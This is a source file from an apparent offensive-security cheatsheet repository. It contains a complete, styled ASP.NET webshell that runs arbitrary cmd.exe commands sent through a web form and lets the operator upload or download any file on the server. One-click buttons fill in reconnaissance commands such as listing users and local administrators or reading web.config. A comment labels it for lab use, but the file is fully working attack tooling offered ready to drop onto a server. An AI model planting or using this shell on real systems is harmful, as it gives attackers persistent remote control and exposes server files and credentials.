daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

nt-webshell-rosepine.aspx (10042B)


      1 <%@ Page Language="C#" ValidateRequest="false" %>
      2 <%@ Import Namespace="System" %>
      3 <%@ Import Namespace="System.IO" %>
      4 <%@ Import Namespace="System.Diagnostics" %>
      5 <script runat="server">
      6     // ============================================================
      7     //  rp-shell.aspx — single-file ASP.NET webshell (Rose Pine)
      8     //  Lab use only — HTB Academy / Attacking Enterprise Networks
      9     // ============================================================
     10     string workDir   = "";
     11     string output    = "";
     12     string statusMsg = "";
     13 
     14     protected void Page_Load(object sender, EventArgs e)
     15     {
     16         // --- restore working directory from previous request ---
     17         workDir = Request.Form["wd"];
     18         if (String.IsNullOrEmpty(workDir) || !Directory.Exists(workDir))
     19             workDir = Server.MapPath(".");
     20 
     21         // --- file download: ?get=<path> ---
     22         string dl = Request.QueryString["get"];
     23         if (!String.IsNullOrEmpty(dl))
     24         {
     25             string full = Path.IsPathRooted(dl) ? dl : Path.Combine(workDir, dl);
     26             if (File.Exists(full))
     27             {
     28                 Response.Clear();
     29                 Response.ContentType = "application/octet-stream";
     30                 Response.AddHeader("Content-Disposition",
     31                     "attachment; filename=" + Path.GetFileName(full));
     32                 Response.TransmitFile(full);
     33                 Response.End();
     34             }
     35             statusMsg = "download failed: file not found -> " + full;
     36         }
     37 
     38         // --- file upload ---
     39         if (Request.Files.Count > 0 && Request.Files[0].ContentLength > 0)
     40         {
     41             try
     42             {
     43                 string dest = Path.Combine(workDir,
     44                     Path.GetFileName(Request.Files[0].FileName));
     45                 Request.Files[0].SaveAs(dest);
     46                 statusMsg = "uploaded -> " + dest;
     47             }
     48             catch (Exception ex) { statusMsg = "upload failed: " + ex.Message; }
     49         }
     50 
     51         // --- command execution ---
     52         string cmd = Request.Form["cmd"];
     53         if (!String.IsNullOrEmpty(cmd))
     54         {
     55             string t = cmd.Trim();
     56             if (t == "cd" || t.StartsWith("cd ") || t.StartsWith("cd\\") || t.StartsWith("cd/"))
     57             {
     58                 string target = t.Length > 2 ? t.Substring(2).Trim() : "";
     59                 if (target.Length == 0)
     60                 {
     61                     output = workDir;
     62                 }
     63                 else
     64                 {
     65                     string newDir = Path.IsPathRooted(target)
     66                         ? target
     67                         : Path.GetFullPath(Path.Combine(workDir, target));
     68                     if (Directory.Exists(newDir)) { workDir = newDir; output = ""; }
     69                     else output = "The system cannot find the path specified.";
     70                 }
     71             }
     72             else if (t == "cls" || t == "clear")
     73             {
     74                 output = "";
     75             }
     76             else
     77             {
     78                 output = RunCmd(cmd);
     79             }
     80         }
     81     }
     82 
     83     string RunCmd(string c)
     84     {
     85         try
     86         {
     87             Process p = new Process();
     88             p.StartInfo.FileName = "cmd.exe";
     89             p.StartInfo.Arguments = "/c " + c;
     90             p.StartInfo.WorkingDirectory = workDir;
     91             p.StartInfo.RedirectStandardOutput = true;
     92             p.StartInfo.RedirectStandardError = true;
     93             p.StartInfo.UseShellExecute = false;
     94             p.StartInfo.CreateNoWindow = true;
     95             p.Start();
     96             string so = p.StandardOutput.ReadToEnd();
     97             string se = p.StandardError.ReadToEnd();
     98             p.WaitForExit(60000);
     99             string r = so + (se.Length > 0 ? "\r\n" + se : "");
    100             return r.TrimEnd();
    101         }
    102         catch (Exception ex) { return "error: " + ex.Message; }
    103     }
    104 
    105     string Banner()
    106     {
    107         string u = "", h = "";
    108         try { u = RunCmd("whoami").Trim(); } catch { u = "?"; }
    109         try { h = Environment.MachineName; } catch { h = "?"; }
    110         return h + " :: " + u;
    111     }
    112 </script>
    113 <!DOCTYPE html>
    114 <html>
    115 <head>
    116 <meta charset="utf-8">
    117 <title>rp-shell :: <%: Banner() %></title>
    118 <style>
    119     :root{
    120         --base:#191724; --surface:#1f1d2e; --overlay:#26233a;
    121         --muted:#6e6a86; --subtle:#908caa; --text:#e0def4;
    122         --love:#eb6f92; --gold:#f6c177; --rose:#ebbcba;
    123         --pine:#31748f; --foam:#9ccfd8; --iris:#c4a7e7;
    124     }
    125     *{box-sizing:border-box;}
    126     body{
    127         background:var(--base); color:var(--text);
    128         font-family:"Cascadia Code",Consolas,"Courier New",monospace;
    129         margin:0; padding:24px; font-size:14px;
    130     }
    131     .wrap{max-width:960px; margin:0 auto;}
    132     .card{
    133         background:var(--surface); border:1px solid var(--overlay);
    134         border-radius:10px; padding:18px 20px; margin-bottom:16px;
    135     }
    136     .banner{
    137         font-size:15px; color:var(--foam); letter-spacing:.5px;
    138         border-left:3px solid var(--iris); padding-left:12px;
    139     }
    140     .banner b{color:var(--love);}
    141     .meta{color:var(--subtle); font-size:12px; margin-top:6px;}
    142     .meta span{color:var(--gold);}
    143     .pwd{color:var(--pine); word-break:break-all;}
    144     .pwd b{color:var(--foam);}
    145     pre{
    146         background:var(--base); border:1px solid var(--overlay);
    147         border-radius:8px; padding:14px; overflow-x:auto;
    148         white-space:pre-wrap; word-break:break-all;
    149         color:var(--text); min-height:60px; margin:12px 0;
    150     }
    151     .status{color:var(--gold); font-size:12px; min-height:16px;}
    152     input[type=text]{
    153         width:100%; background:var(--overlay); color:var(--text);
    154         border:1px solid var(--muted); border-radius:6px;
    155         padding:10px 12px; font-family:inherit; font-size:14px;
    156     }
    157     input[type=text]:focus{outline:none; border-color:var(--iris);}
    158     .row{display:flex; gap:8px; margin-top:10px; flex-wrap:wrap; align-items:center;}
    159     .btn{
    160         background:var(--pine); color:var(--text); border:none;
    161         border-radius:6px; padding:9px 18px; cursor:pointer;
    162         font-family:inherit; font-size:13px;
    163     }
    164     .btn:hover{background:var(--foam); color:var(--base);}
    165     .btn.alt{background:var(--overlay); color:var(--subtle);}
    166     .btn.alt:hover{background:var(--muted); color:var(--text);}
    167     .chips{margin-top:10px; display:flex; gap:6px; flex-wrap:wrap;}
    168     .chip{
    169         background:var(--overlay); color:var(--iris); border:1px solid var(--muted);
    170         border-radius:12px; padding:3px 10px; font-size:11px; cursor:pointer;
    171     }
    172     .chip:hover{background:var(--iris); color:var(--base);}
    173     .fileline{display:flex; gap:8px; margin-top:8px; align-items:center;}
    174     .fileline input[type=file]{color:var(--subtle); font-size:12px;}
    175     .hint{color:var(--muted); font-size:11px; margin-top:8px;}
    176     a{color:var(--foam);}
    177 </style>
    178 </head>
    179 <body>
    180 <div class="wrap">
    181 
    182     <div class="card">
    183         <div class="banner">rp-shell :: <b><%: Banner() %></b></div>
    184         <div class="meta">
    185             remote <span><%: Request.ServerVariables["REMOTE_ADDR"] %></span> ::
    186             server <span><%: Request.ServerVariables["SERVER_SOFTWARE"] %></span> ::
    187             iis <span><%: Request.ServerVariables["SERVER_NAME"] %>:<%: Request.ServerVariables["SERVER_PORT"] %></span>
    188         </div>
    189     </div>
    190 
    191     <div class="card">
    192         <div class="pwd">cwd :: <b><%: workDir %></b></div>
    193         <pre id="out"><%: output %></pre>
    194         <div class="status"><%: statusMsg %></div>
    195 
    196         <form method="post" enctype="multipart/form-data">
    197             <input type="hidden" name="wd" value="<%: workDir %>">
    198             <input type="text" name="cmd" id="cmd" autocomplete="off"
    199                    autofocus placeholder="command... (cd supported, cls clears)">
    200             <div class="row">
    201                 <button class="btn" type="submit">run</button>
    202                 <button class="btn alt" type="submit" name="cmd" value="cls">clear</button>
    203             </div>
    204             <div class="chips">
    205                 <span class="chip" onclick="fill('whoami /all')">whoami /all</span>
    206                 <span class="chip" onclick="fill('whoami /priv')">whoami /priv</span>
    207                 <span class="chip" onclick="fill('hostname &amp; ipconfig')">ipconfig</span>
    208                 <span class="chip" onclick="fill('dir')">dir</span>
    209                 <span class="chip" onclick="fill('net user')">net user</span>
    210                 <span class="chip" onclick="fill('net localgroup administrators')">local admins</span>
    211                 <span class="chip" onclick="fill('systeminfo | findstr /B /C:&quot;OS&quot;')">os info</span>
    212                 <span class="chip" onclick="fill('type web.config')">type web.config</span>
    213             </div>
    214             <div class="fileline">
    215                 <input type="file" name="f">
    216                 <button class="btn alt" type="submit">upload to cwd</button>
    217             </div>
    218         </form>
    219 
    220         <form method="get" class="fileline">
    221             <input type="text" name="get" placeholder="download path, e.g. C:\DotNetNuke\Portals\0\web.config">
    222             <button class="btn alt" type="submit">download</button>
    223         </form>
    224 
    225         <div class="hint">
    226             up/down arrows = command history ::
    227             upload drops files into the current working directory ::
    228             remember to delete this file during cleanup
    229         </div>
    230     </div>
    231 
    232 </div>
    233 <script>
    234     var hist = [], hi = -1;
    235     var box = document.getElementById("cmd");
    236     function fill(c){ box.value = c; box.focus(); }
    237     box.form.addEventListener("submit", function(){
    238         if (box.value) hist.push(box.value);
    239     });
    240     box.addEventListener("keydown", function(e){
    241         if (e.key === "ArrowUp"){ e.preventDefault();
    242             if (hist.length){ hi = Math.max(0, hi < 0 ? hist.length - 1 : hi - 1); box.value = hist[hi]; } }
    243         if (e.key === "ArrowDown"){ e.preventDefault();
    244             if (hist.length){ hi = Math.min(hist.length - 1, hi + 1); box.value = hist[hi]; } }
    245     });
    246     document.getElementById("out").scrollTop = 0;
    247 </script>
    248 </body>
    249 </html>